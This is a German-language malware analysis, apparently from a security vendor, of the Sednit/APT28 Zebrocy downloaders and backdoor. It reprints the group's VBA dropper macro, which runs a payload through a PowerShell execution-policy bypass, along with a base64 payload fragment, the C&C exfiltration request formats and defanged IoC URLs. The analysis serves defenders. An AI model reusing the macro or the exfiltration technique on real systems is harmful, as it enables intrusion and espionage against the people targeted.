Sednit Update: Analyse von Zebrocy

Die Sednit-Gruppierung – auch bekannt als APT28, Fancy Bear, Sofacy oder STRONTIUM – ist eine Truppe von Angreifern, welche seit mindestens 2004 aktiv ist. Hauptsächlich beabsichtigen sie das Stehlen von geheimen Informationen von spezifischen Zielen.

Gegen Ende des Jahres 2015 sahen wir den Beginn der Benutzung einer neuen Komponente; einen Downloader für die Haupt-Backdoor von Sednit: Xagent. Zuerst erwähnte Kaspersky die Komponente im Jahr 2017 im APT Trend Report. Erst kürzlich berichteten sie darüber in einem Beitrag, wobei sie ihr den Namen Zebrocy gaben.

Die neue Komponente beschreibt eine neue Malware-Familie, kompromittierte Downloader und Backdoors, die in Delphi und AutoIt geschrieben sind. Diese Komponenten spielen im Sednit-Ökosystem die gleiche Rolle wie Seduploader (als First-Stage Malware).

Die von Zebrocy betroffenen Opfer befinden sich in Aserbaidschan, Bosnien und Herzegowina, Ägypten, Georgien, Iran, Kasachstan, Korea, Kirgisistan, Russland, Saudi-Arabien, Serbien, Schweiz, Tadschikistan, Türkei, Turkmenistan, Ukraine, Uruguay und Simbabwe. Zu den Zielen gehören Botschaften, Außenministerien und Diplomaten.

Die Zebrocy-Familie besteht aus drei Komponenten. In der Reihenfolge der Bereitstellung sind das ein Delphi-Downloader, ein AutoIt-Downloader und eine Delphi-Backdoor. Abbildung 1 zeigt den Zusammenhang zwischen den Komponenten.

In diesem Artikel beschreiben wir die Malware-Familie und wie sie mit dem älteren Ausspähtool Seduploader koexistiert. Am Ende erläutern wir einige Gemeinsamkeiten und Unterschiede in Bezug auf Downdelph.

Abbildung 1: Das Sednit-Ökosystem

Abbildung 1 zeigt die von Sednit verwendeten Angriffsmethoden und die aktive Malware. E-Mail-Anhänge dienen als Einfallstor, um mit dem Sednit-Ökosystem in Berührung zu kommen. Dabei wird immer noch DealersChoice verwendet, wie neuere Analysen von Palo Alto Networks ergaben. Sowohl Seduploader als auch Zebrocy werden von der Sednit-Gruppe durch E-Mail-Anhänge aktiv verbreitet. Schließlich werden Xagent und Xtunnel nach einer Erkundungsphase auf die Ziele übertragen, die von den Sednit-Angreifern als interessant erachtet werden.

Zebrocy-Angriffsmethoden

Die erste Komponente des Angriffs erreicht die Opfer per E-Mail. Opfer werden dazu verleitet, E-Mail-Anhänge zu öffnen, bei denen es sich entweder um Microsoft Office-Dokumente oder um Datei-Archive handelt.

Zebrocys schädliche Dokumente

Schädliche Dokumente, die von Sednit verwendet werden, laden die Nutzlast der ersten Stufe über Visual Basic für Applikationen (VBA) herunter, wenden sie an oder greifen auf Dynamic Data Exchange (DDE) zurück.

Ende des Jahres 2017 hat die Sednit-Gruppe zwei Kampagnen initiiert, die zwei verschiedene bösartige Dokumente ausliefern. Das erste trägt den Dateinamen Syria – New Russia provocations.doc und das zweite lautet Note Letter Mary Christmas Card.doc.

Abbildung 2: Zebrocys schädliche Dokumente

Beide schädlichen Dokumente enthalten einen VBA-Makro, der eine zufällig benannte Datei in %TEMP% erstellt. Die ausführbare Malware wird dann dekodiert und in diese Datei geschrieben, die dann über einen PowerShell-Befehl oder über Scriptable Shell Objects ausgeführt wird.

[...]

Sub AutoClose()

On Error Resume Next

vAdd = ""

For I = 1 To 8

vAdd = vAdd + Chr(97 + Rnd(20) * 25)

Next

vFileName = Environ("temp") & "\" + vAdd & ".e" + "x" & "e"

SaveNew vFileName, UserForm1.Label1.Caption

Application.Run "XYZ", vFileName, "WScript.Shell"

End Sub

Public Function XYZ(vF, vW)

vStr = "powershell.exe -nop -Exec Bypass -Command Start-Process '" + vF + "';"

Call CreateObject(vW).Run(vStr, 0)

End Function

[...]

TVpQAAIAAAAEAA8A//8AALgAAAAAAAAAQAAaAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

AAAAAAEAALoQAA4ftAnNIbgBTM0hkJBUaGlzIHByb2dyYW0gbXVzdCBiZSBydW4gdW5kZXIgV2lu

[...]

Beispiel für die Visual Basic Funktion und die base64-verschlüsselte first stage aus dem Office-Dokument Syria – New Russia provocations.doc.

Zebrocys Datei-Archive

Einige Kampagnen verwenden anstatt eines Office-Dokumentmakros ein Datei-Archiv, um die first stage Malware auf den Computer des Opfers abzuladen. Das Archiv wird vermutlich als E-Mail-Anhang überliefert. Die erste Stufe der Zebrocy-Familie beinhaltet ausführbare Dateien mit einem Icon und einem .doc-ähnlichen Dateinamen. Potentielle Opfer sollen auf diesen Trick hereinfallen. Ein Beispiel ist in Abbildung 3 zu sehen.

Abbildung 3: Zebrocy first stage Malware imitiert ein Word-Dokument Icon.

Delphi-Downloader

Ein Delphi-Downloader gehört zur ersten Stufen der Zebrocy-Familie. Allerdings haben wir auch Malware-Kampagnen gesehen, in denen die Sednit-Gruppe direkt den AutoIt Downloader einsetzte. Die meisten der Delphi-Downloader-Binärdateien verwenden Office-Dokumentsymbole oder andere Symbole wie von Windows-Bibliotheken. Manchmal sind die Samples mit UPX gepackt. Mit der Downloader-Phase verfolgt Sednit den Zweck, möglichst viele Informationen über den PC des Opfers herauszubekommen.

Wird die Malware gestartet, erscheint ein Pop-up Fenster mit einer Fehlermeldung und dem Dateinamen der abgeladenen Binary. Ist der schädliche Dateiname beispielsweise srsiymyw.exe, lautet der dazugehörige scheinbare Dateiname, wie er im Fenster angezeigt wird: srsiymyw.doc (Abb. 4). Das Pop-up soll den User ablenken und glauben lassen, dass nichts Ungewöhnliches auf dem Computer geschieht.

Abbildung 4: Delphi-Downloader Pop-up Fenster

Tatsächlich ist der Downloader damit beschäftigt, eine leere Datei unter %TEMP% (mit einem in seiner Binärdatei fest codierten Dateinamen) zu erstellen. Persistenz wird durch einen Windows-Registrierungseintrag unter HKCU\Software\Microsoft\Windows\CurrentVersion\Run\ mit dem fest vorgeschriebenen Dateipfad geschaffen.

Um Informationen zu sammeln, erstellt die Malware einen neuen Prozess mit der Windows API CreateProcess-Funktion mit cmd.exe /c SYSTEMINFO & TASKLIST als lpCommandLine-Argument. Sobald die Informationen abgerufen sind, sendet der Prozess das Ergebnis über eine HTTP-POST-Anfrage an den C&C-Server, der in der Binärdatei fest codiert ist. Das wiederholt sich solange, bis die nächste Stufe freigegeben wird.

POST (\/[a-zA-Z0-9\-\_\^\.]*){3}\.(php|dat)?fort=<SerialNumber_C> HTTP/1.0

Connection: keep-alive

Content-Type: application/x-www-form-urlencoded

Content-Length: xxxx

Host: <ip_address>

Accept: text/html, */*

Accept-Encoding: identity

User-Agent: Mozilla v5.1 (Windows NT 6.1; rv:6.0.1) Gecko/20100101 Firefox/6.0.1

pol=MM/DD/YYYY%20HH:MM:SS%20(AM|PM)%0D%0A<DriveListing>%0D%0A%0D%0A<Path_to_the_binary>%0D%0A%0D%0A<SYSTEMINFO & TASKLIST output>

[...]

Delphi-Downloader HTTP-POST-Anfrage

Sobald die Anfrage übermittelt wurde, antwortet der C&C-Server durch das Senden der nächsten Stufe, insofern das Ziel von Sednit als interessant eingestuft wurde. Die Zeit zwischen dem Senden des Berichts und dem Erhalt der Payload beträgt einige Stunden. Die nächste Stufe wird in die zuvor erstellte Datei geschrieben und ausgeführt.

AutoIt-Downloader

Der AutoIt-Downloader ist eine weitere Komponente der Kompromittierung des Computers des Opfers in der Aufklärungsphase. Ab dann sind zwei Szenarien möglich. Entweder ist der Delphi-Downloader die erste und der AutoIt-Downloader – in einer leichteren Variante – die zweite Stufe. Oder der AutoIt-Downloader kommt allein zum Einsatz. Dann besitzt er alle Funktionalitäten des Delphi-Downloaders und sogar noch mehr.

Wenn der AutoIt-Downloader die einzige Stufe ist, erfüllt er viele Aufklärungsfunktionen. Selbst wenn dieser Downloader einige Ähnlichkeiten mit dem Delphi-Downloader aufweist, wie zum Beispiel den Persistenz-Mechanismus und das Pop-up Fenster, ist die Aufklärung jedoch detaillierter. Hier ist eine unvollständige Liste seiner Fähigkeiten:

• Entdecken von Sandboxen und virtuellen Umgebungen
• Abrufen einer Liste von installierter Software via HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
• Aufrufen der Windows-Version: 32- oder 64-bit
• Auflisten von Prozessen
• Informationen über Hardware
• Aufnehmen eines Screenshots
• Verschiedenste Informationen via Windows Management Instrumentation (WMI), wahrscheinlich durch diese GitHub Repository inspiriert

Der Name der AutoIt-Binärdatei hängt von der vorherigen Phase ab. Wenn die Malware als erste Stufe abgeladen wird, hat sie einen dokumentähnlichen Namen. Andernfalls wird der im Delphi-Downloader fest codierte Name herangezogen, wie in Tabelle 1 gezeigt.

Der Zweck dieser Phase ist mehr oder weniger der gleiche wie bei der vorherigen. Es gibt viele verschiedene Versionen "in der Wildnis", aber alle enthalten mindestens einen Code, um Folgendes zu erreichen:

• Abrufen der Seriennummer der Festplatte C:
• Verwenden der Netzwerkfunktionen von winhttp.dll oder winhttp.au3
• Ausführen der vom C&C-Server empfangenen Payload

Genauso wie der Delphi-Downloader erzeugt auch AutoIt ein Pop-up Fenster, wenn es über einen E-Mail-Anhang verbreitet wird – AutoIt ist dann die erste Stufe. Der Begrüßungsbildschirm ist mit dem Binärsymbol verknüpft. Beispielsweise kann der AutoIt das Adobe Reader Symbol im Pop-up anzeigen. Dann erscheint aber die Meldung, dass die PDF-Datei beschädigt ist. In einem anderen Fall übermittelt der Downloader eine Binärdatei mit Word-Symbol. Hierbei wird der User durch folgendes Pop-Up nach einem Passwort gefragt. Wahrscheinlich soll diese Aktion von der bösartigen Aktivität im Hintergrund ablenken.

Abbildung 5: AutoIt-Downloader Pop-up mit Word-Icon

Die Delphi-Backdoor

Die Delphi-Backdoor bildet das letzte Stadium der Zebrocy-Komponentenkette. Wir beobachteten, wie Zebrocy in der Vergangenheit die Flaggschiff-Backdoor der Sednit-Gruppe „Xagent“ herunterlud.

Im Gegensatz zu den vorherigen Komponenten besitzt diese eine interne Versionsnummer, die nicht in Verbindung mit einer bestimmten Kampagne steht. Diese Versionsnummer hat sich eher im Laufe der Zeit entwickelt, wie Tabelle 2 zeigt:

Wir möchten an dieser Stelle erwähnen, dass wir unter Umständen nicht alle Versionen aufgelistet haben, da auch wir nicht über vollständige Informationen verfügen. Außerdem gibt es einige Überschneidungen der Versionen untereinander, was bedeutet, dass einige ältere Versionen gleichzeitig neben neueren Versionen existieren.

In den nächsten Abschnitten weisen wir auf einige Unterschiede hin, die wir bei der Entwicklung der Malware beobachteten.

Die Backdoor enthält einen Konfigurationsblock. Die Konfigurationsinhalte ändern sich von einem Sample zum anderen, aber die Liste der konfigurierbaren Elemente bleibt gleich. Die Art und Weise in der die Konfigurationsdaten in der Malware-Stichprobe gespeichert werden, hat sich jedoch im Laufe der Zeit weiterentwickelt.

Die ersten Versionen der Hintertür integrierten die Konfigurationsdaten im Klartext, wie Abbildung 6 zeigt.

Abbildung 6: Konfigurationsdaten im Klartext im Delphi-Backdoor

In späteren Versionen codierten die Sednit Malware-Entwickler die Konfigurationsdaten als Hexadezimalzeichenfolgen, wie in Abbildung 7 dargestellt.

Abbildung 7: Verschlüsselte Konfigurationsdaten im Delphi-Backdoor

In den neuesten Versionen werden die Konfigurationsdaten in den Ressourcen mit dem AES-Algorithmus verschlüsselt. Ältere Versionen speicherten diese im .text-Abschnitt.

Die Konfigurationsdaten enthalten:

• AES-Schlüssel für die Kommunikation mit dem C&C-Server
• URLs mit Pfaden, die sich von einem zum anderem Sample unterscheiden
• Die Version der Malware
• Den Windows-Registrierungsschlüssel/Wert, der die Persistenz der Hintertür gewährleistet
• Den Pfad, in dem temporäre Dateien gespeichert werden (% APPDATA%)
• Die Namen der versteckten Verzeichnisse, die zum Speichern temporärer Dateien erstellt werden: Die Verzeichnisnamen werden mit der Umgebungsvariablen verknüpft (% APPDATA%)

Sobald die Malware eingerichtet ist, führt sie Callback-Funktionen über die Windows-API-Funktion SetTimer aus. Diese Callbacks ermöglichen es Sednit, viele Funktionen und Befehle der Hintertür zu handhaben:

• Aufnahme eines Screenshots vom Desktop des Opfers
• Erfassen von Tastatureingaben
• Listen von Laufwerken und Netzwerkressourcen
• Lese- & Schreib-Rechte in der Windows-Registrierung
• Kopieren / Verschieben / Löschen von Dateisystemobjekten
• Ausführen von Dateien oder Aufgabenplanung

Die Anzahl der von den Hintertüren handhabbaren Befehlen - ungefähr 30 - unterscheidet sich von einer zur anderen Version. Um mit dem C&C-Server zu kommunizieren, speichert die Backdoor den Bericht der Funktionen in einer temporären Datei. Dann liest die Backdoor den Inhalt der temporären Datei und sendet sie weiter. Diese temporären Dateien werden in versteckten Verzeichnissen gespeichert, die während der Einrichtungsphase erstellt wurden.

POST (\/[a-zA-Z0-9\-\_\^\.]*){3}\.(php|dat). HTTP/1.0

Connection: keep-alive

Content-Type: multipart/form-data; boundary=--------<mmddyyhhnnsszzz>

Content-Length: <N>

Host: <ip_address>

Accept: text/html, */*

Accept-Encoding: identity

User-Agent: Mozilla/3.0 (compatible; Indy Library)

----------<mmddyyhhnnsszzz>

Content-Disposition: form-data; name="userfile"; filename="%APPDATA%\Microsoft\<directories>\<tempfilename>.tmp"

Content-Type: <tempfilename_hex_encoded>.tmp

<tempfilename content>

----------<mmddyyhhnnsszzz>--

Delphi-Backdoor POST-Anfrage

Der tempfilename Inhalt ist der Output jeglicher ausgeführten Befehle. Der Inhalt wird unter Verwendung des AES-256-ECB-Algorithmus mit dem ersten AES-Schlüssel aus den Konfigurationsdaten verschlüsselt, dann wird die Ausgabe hexadezimal codiert. Die an den C&C-Server gesendeten Inhalte variieren vom einen Befehl zum anderen. Alle enthalten aber mindestens die Seriennummer der Festplatte und die ersten vier Bytes des Computernamens.

Zum Beispiel enthält das erste von der Hintertür gesendete Paket „HELLO“, um einen Kontakt mit dem C&C-Server herzustellen. Wie unten aufgeführt, enthält das Paket das Datum, an dem die Aufgabe gestartet wurde, die interne Versionsnummer der Delphi-Backdoor, die Seriennummer der Festplatte, den Computernamen (die ersten vier Bytes), den Befehl und das Datum, an dem die Hintertür ausgeführt wurde.

Start: 1/4/2018 1:37:00 PM - [<vx.x>]:42424242ESET-HELLO-[2018-04-04 01-37-00]-315.TXT.

Der zweite AES-Schlüssel aus den Konfigurationsdaten wird verwendet, um die Antwort vom C&C-Server zu entschlüsseln.

Wie Seduploader wird diese Backdoor verwendet, um Xagent auf den Computern der Opfer zu verteilen, die nach der Erkundungsphase als "interessant" eingestuft wurden.

Zusammenfassung

Eine mit Delphi geschriebene Komponente ist für die Sednit-Gruppe, die diese Umgebung bereits für Downdelph verwendet hat, nichts Neues. Selbst wenn die neueste Komponente mit Downdelph vom technischen Aspekt her nichts mehr zu tun hat, gibt es jedoch ein paar erwähnenswerte Überschneidungen.

• Beide verbreiten sich via E-Mail-Anhang.
• Wir sahen Downdelph zum letzten Mal im September 2015, und die erste Probe von Zebrocy im November 2015.
• Beide sind mit Delphi geschrieben.

Wir können davon ausgehen, dass die Sednit-Gruppe eine ihrer bisherigen Komponenten für Zebrocy aufgab. Hinsichtlich einiger Fehler änderte sich Sednit allerdings nicht:

• Der Name von geplanten Aufgaben: Windiws
• Der Funktionsname, der Systeminformationen im AutoIt-Downloader abruft, lautet _SOFWARE ().
• Mary statt Merry im Note Letter Mary Christmas Card.doc

Die Byte-Arrays, die von der Delphi-Backdoor als AES-256-Schlüssel verwendet werden, sind 38 Byte anstatt 32 Byte lang. Es ist kein Schreibfehler – eher mangelte es hierbei wohl an Aufmerksamkeit.

Wir beobachteten, dass Zebrocy in den letzten zwei Jahren von der Sednit-Gruppe stark genutzt wurde. Unsere Analyse der vielen neuen Varianten, die seit 2017 regelmäßig erscheinen, zeigt deutlich, dass Zebrocy von seinen Malware-Entwicklern aktiv gepflegt und verbessert wird. Wir betrachten Zebrocy als stabiles, ausgereiftes Werkzeuge im Sednit-Arsenal.

IoCs

Malicious documents

Delphi downloader

AutoIt downloader

Delphi backdoor

URLs

http://142[.]0.68.2/test-update-16-8852418/temp727612430/checkUpdate89732468.php
http://142[.]0.68.2/test-update-17-8752417/temp827612480/checkUpdate79832467.php
http://185[.]25.50.93/syshelp/kd8812u/protocol.php
http://185[.]25.50.93/tech99-04/litelib1/setwsdv4.php
http://185[.]25.50.93/techicalBS391-two/supptech18i/suppid.php
http://185[.]25.51.114/get-help-software/get-app-c/error-code-lookup.php
http://185[.]25.51.164/srv_upd_dest_two/destBB/en.php
http://185[.]25.51.198/get-data/searchId/get.php
http://185[.]25.51.198/stream-upd-service-two/definition/event.php
http://185[.]77.129.152/wWpYdSMRulkdp/arpz/MsKZrpUfe.php
http://188[.]241.68.121/update/dB-Release/NewBaseCheck.php
http://194[.]187.249.126/database-update-centre/check-system-version/id=18862.php
http://194[.]187.249.126/security-services-DMHA-group/info-update-version/id77820082.php
http://213[.]103.67.193/ghflYvz/vmwWIdx/realui.php
http://213[.]252.244.219/client-update-info/version-id/version333.php
http://213[.]252.244.219/cumulative-security-update/Summary/details.php
http://213[.]252.245.132/search-release/Search-Version/crmclients.php
http://213[.]252.245.132/setting-the-os-release/Support-OS-release/ApiMap.php
http://220[.]158.216.127/search-sys-update-release/base-sync/db7749sc.php
http://222[.]15.23.121/gft_piyes/ndhfkuryhs09/fdfd_iunb_hhert_ps.php
http://46[.]102.152.127/messageID/get-data/SecurityID.php
http://46[.]183.223.227/services-check-update/security-certificate-11-554/CheckNow864.php
http://80[.]255.6.5/daily-update-certifaicates52735462534234/update-15.dat
http://80[.]255.6.5/LoG-statistic8397420934809/date-update9048353094c/StaticIpUpdateLog23741033.php
http://86[.]105.18.106/apps.update/DetailsID/clientPID-118253.php
http://86[.]105.18.106/data-extract/timermodule/update-client.php
http://86[.]105.18.106/debug-info/pluginId/CLISD1934.php
http://86[.]105.18.106/ram-data/managerId/REM1234.php
http://86[.]105.18.106/versionID/Plugin0899/debug-release01119/debug-19.app
http://86[.]105.18.111/UpdateCertificate33-33725cnm^BB/CheckerNow-saMbA-99-36^11/CheckerSerface^8830-11.php
http://86[.]106.131.177/srvSettings/conf4421i/support.php
http://86[.]106.131.177/SupportA91i/syshelpA774i/viewsupp.php
http://89[.]249.65.166/clientid-and-uniqued-r2/the-differenceU/Events76.php
http://89[.]249.65.166/int-release/check-user/userid.php
http://89[.]249.65.234/guard-service/Servers-ip4/upd-release/mdb4
http://89[.]40.181.126/verification-online/service.911-19/check-verification-88291.php
http://89[.]45.67.153/grenadLibS44-two/fIndToClose12t3/sol41.php
http://89[.]45.67.153/supportfsys/t863321i/func112SerErr.php
http://93[.]113.131.117/KB7735-9927/security-serv/opt.php
http://93[.]113.131.155/Verifica-El-Lanzamiento/Ayuda-Del-Sistema/obtenerId.php
http://93[.]115.38.132/wWpYdSMRulkdp/arpz/MsKZrpUfe.php
http://rammatica[.]com/QqrAzMjp/CmKjzk/EspTkzmH.php
http://rammatica[.]com/QqrAzMjp/CmKjzk/OspRkzmG.php